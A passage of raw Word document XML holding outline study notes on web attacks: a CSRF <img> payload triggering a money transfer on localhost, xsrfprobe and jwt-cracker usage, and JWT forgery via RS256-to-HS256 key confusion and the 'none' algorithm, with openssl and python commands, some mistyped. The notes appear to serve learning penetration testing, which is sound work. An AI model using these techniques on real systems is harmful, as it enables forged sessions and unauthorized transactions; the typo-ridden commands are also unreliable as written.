          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>works because the victim is making the request, not the site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7D1062" w14:textId="091997B3" w:rsidR="008142E8" w:rsidRDefault="008142E8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>site views a normal user making a normal request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DD5A89" w14:textId="654976B4" w:rsidR="008142E8" w:rsidRDefault="008142E8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Manual Exploitation of CSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5BC7C8" w14:textId="08E1A3F7" w:rsidR="008142E8" w:rsidRDefault="008142E8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Burpsuite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535BDE3F" w14:textId="5F5D3B84" w:rsidR="008142E8" w:rsidRDefault="008142E8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>examine requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C1325D" w14:textId="2D0830AC" w:rsidR="008142E8" w:rsidRDefault="008142E8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>customizable parameters and automatically set cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E400430" w14:textId="2DB59247" w:rsidR="008142E8" w:rsidRDefault="008142E8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Putting malicious code into html file and hosting via SimpleHTTPServer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B97DBE" w14:textId="15EE21D9" w:rsidR="008142E8" w:rsidRDefault="008142E8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="008142E8">
        <w:t>&lt;img src="http://localhost:3000/transfer?to=alice&amp;amount=100"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9543FE" w14:textId="5290E3EA" w:rsidR="008142E8" w:rsidRDefault="008142E8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Automatic Exploitation of CSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B84605A" w14:textId="15DF61DF" w:rsidR="008142E8" w:rsidRDefault="008142E8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>xsrfprobe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BA7471" w14:textId="744D4BCF" w:rsidR="008142E8" w:rsidRDefault="008142E8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>pip3 install xsrfprobe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54623F28" w14:textId="44074BB8" w:rsidR="008142E8" w:rsidRDefault="008142E8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>syntax – xsrfprobe -u &lt;url&gt;</w:t>
      </w:r>
      <w:r w:rsidR="001A7205">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidR="001A7205">
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0AC724" w14:textId="66F0B14D" w:rsidR="008142E8" w:rsidRDefault="008142E8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>flag - -malicious – generates POC exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACEC08C" w14:textId="57026AAB" w:rsidR="001A7205" w:rsidRDefault="001A7205" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>JWT – JSON Web Token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C2F585" w14:textId="1B5ED31C" w:rsidR="001A7205" w:rsidRDefault="001A7205" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>basic structure – header.payload.secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD5AC92" w14:textId="508C8426" w:rsidR="001A7205" w:rsidRDefault="001A7205" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>secret only known to server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B68497" w14:textId="4A165931" w:rsidR="001A7205" w:rsidRDefault="001A7205" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>make sure data isn’t changed along the way</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56687F25" w14:textId="0835DD22" w:rsidR="001A7205" w:rsidRDefault="001A7205" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>base64 encoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1571035F" w14:textId="5AD407B5" w:rsidR="001A7205" w:rsidRDefault="001A7205" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>if secret can be controlled, so can the data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1338862B" w14:textId="4C384188" w:rsidR="001A7205" w:rsidRDefault="001A7205" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>understand how secret is calculated by understanding header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2536CB49" w14:textId="68A60471" w:rsidR="001A7205" w:rsidRDefault="001A7205" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. {“typ”:”JWT”,”alg”:”&lt;alg&gt;”}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440545A8" w14:textId="1F9D6A50" w:rsidR="001A7205" w:rsidRDefault="001A7205" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>RS256 is not vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75043E86" w14:textId="36A525BA" w:rsidR="001A7205" w:rsidRDefault="001A7205" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;alg&gt; field can be changed to HS256, which is calculated using servers public key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A51B45" w14:textId="6BD1A94F" w:rsidR="001A7205" w:rsidRDefault="001A7205" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>accessible occasionally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED40024" w14:textId="35B0310D" w:rsidR="000212CE" w:rsidRDefault="000212CE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>secret calculation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43569657" w14:textId="708D819F" w:rsidR="000212CE" w:rsidRDefault="000212CE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000212CE">
        <w:t>HMACSHA256( base64UrlEncode(header) + "." + base64UrlEncode(payload), secret)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB29D41" w14:textId="28A56820" w:rsidR="000212CE" w:rsidRDefault="000212CE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>with full JWT token, and header and payload, secret can be brute forced to obtain full JWT token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C985782" w14:textId="1B1F544C" w:rsidR="000212CE" w:rsidRDefault="000212CE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>if it can be bruteforced, attackers can sign own tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF1B7A3" w14:textId="6BA74395" w:rsidR="000212CE" w:rsidRDefault="000212CE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Bruteforcing JWT Tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD8A9B0" w14:textId="7FE54D09" w:rsidR="000212CE" w:rsidRDefault="000212CE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>jwt-cracker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC96103" w14:textId="497D65A7" w:rsidR="000212CE" w:rsidRDefault="000212CE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">syntax - </w:t>
      </w:r>
      <w:r w:rsidR="00F21168" w:rsidRPr="00F21168">
        <w:t>jwt-cracker &lt;token&gt; [alphabet] [max-length]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB1A6A2" w14:textId="196C9D79" w:rsidR="00F21168" w:rsidRDefault="00F21168" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>alphabet and max length are optional parameters (a-z and 12 by default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCC5300" w14:textId="7EFF326D" w:rsidR="001A7205" w:rsidRDefault="001A7205" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Manual JWT Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3E8366" w14:textId="52ADC56B" w:rsidR="005064D5" w:rsidRDefault="005064D5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>find public key of server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0BCB56" w14:textId="01CE2CEC" w:rsidR="001A7205" w:rsidRDefault="005064D5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>change algorithm and sign a new secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9E1CB8" w14:textId="76911547" w:rsidR="005064D5" w:rsidRDefault="005064D5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>change algorithm in header to HS256 and re encode in base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EA2BE5" w14:textId="6F7B85D7" w:rsidR="005064D5" w:rsidRDefault="005064D5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>convert public key to hex so openssl will use it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CA7F7D" w14:textId="650AE975" w:rsidR="005064D5" w:rsidRDefault="005064D5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. cat a | xxd -p | tr -d </w:t>
      </w:r>
      <w:hyperlink r:id="rId126" w:history="1">
        <w:r w:rsidRPr="00F939B4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>\\n</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="61EA6A3C" w14:textId="1B727093" w:rsidR="005064D5" w:rsidRDefault="005064D5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>a is file with public key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105571ED" w14:textId="66C0B86B" w:rsidR="005064D5" w:rsidRDefault="005064D5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>xxd -p turns contents of a file into hex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6FD5B0" w14:textId="698AC390" w:rsidR="005064D5" w:rsidRDefault="005064D5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>tr gets rid of any newlines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7D538B" w14:textId="387C93DC" w:rsidR="005064D5" w:rsidRDefault="005064D5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use openssl to sign as a valid HS256 key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E413145" w14:textId="6E4A54FD" w:rsidR="005064D5" w:rsidRDefault="005064D5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>echo -n “&lt;JWT produced above&gt;” | openseel dgst -sha256 -mac HMAC -macopt hexkey:&lt;hex output&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AB5AB5" w14:textId="7839352D" w:rsidR="005064D5" w:rsidRDefault="005064D5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>decode hex to binary data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BA01A6" w14:textId="645AD6FB" w:rsidR="005064D5" w:rsidRDefault="005064D5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>reencode in base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF64031" w14:textId="0A366151" w:rsidR="005064D5" w:rsidRDefault="005064D5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. python -c “exec</w:t>
      </w:r>
      <w:r w:rsidR="0099644E">
        <w:t>(\”import base64, binascii\nprint base64.urlsafe_b64encode(bin ascii.2ab_hex(‘&lt;key&gt;’)).replace(‘=’,’ ‘)\”)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63401FE3" w14:textId="6D17DD47" w:rsidR="0099644E" w:rsidRDefault="0099644E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use output as secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4790E8B9" w14:textId="31B404C8" w:rsidR="0099644E" w:rsidRDefault="0099644E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Third Algorithm – None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD62F18" w14:textId="1357168F" w:rsidR="0099644E" w:rsidRDefault="0099644E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>used when JWT is still used but security stems from another source to prevent data spoofinh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F09311D" w14:textId="02B3BC43" w:rsidR="0099644E" w:rsidRDefault="0099644E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>some JWT libraries aren’t aware of this, allowing vulnerability that allows switch to None algorithm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444A1355" w14:textId="1572ACD9" w:rsidR="0099644E" w:rsidRDefault="00806F38" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5DCE75" w14:textId="33045ECE" w:rsidR="00806F38" w:rsidRDefault="00070C4C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>copy token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B5D156" w14:textId="41571FC1" w:rsidR="00070C4C" w:rsidRDefault="00070C4C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>decrypt via JSON Web Tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4669F685" w14:textId="7CEEFDDB" w:rsidR="00070C4C" w:rsidRDefault="00070C4C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use RsaToHmac.py in TokenBreaker package to create new JSON token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778DAA93" w14:textId="351CF6F6" w:rsidR="00070C4C" w:rsidRDefault="00070C4C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>input options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333AFDAE" w14:textId="44E85E18" w:rsidR="00070C4C" w:rsidRDefault="00070C4C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>copy newly generated token and apply</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216EA11B" w14:textId="1D76685E" w:rsidR="00070C4C" w:rsidRDefault="00070C4C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Manual Exploitation of JWT using None Variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628E9E6F" w14:textId="36138C27" w:rsidR="00070C4C" w:rsidRDefault="00070C4C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>open Developer &gt; Storage &gt; Token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F4726F" w14:textId="7049DDF1" w:rsidR="00070C4C" w:rsidRDefault="00070C4C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>jwt.io</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD44DF3" w14:textId="3F4D94B1" w:rsidR="00070C4C" w:rsidRDefault="00070C4C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>decode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4E1CB9" w14:textId="22329776" w:rsidR="00070C4C" w:rsidRDefault="00070C4C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>change alg field to none</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E94F8E" w14:textId="1F98874B" w:rsidR="00070C4C" w:rsidRDefault="00070C4C" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>remove signature</w:t>
      </w:r>
    </w:p>
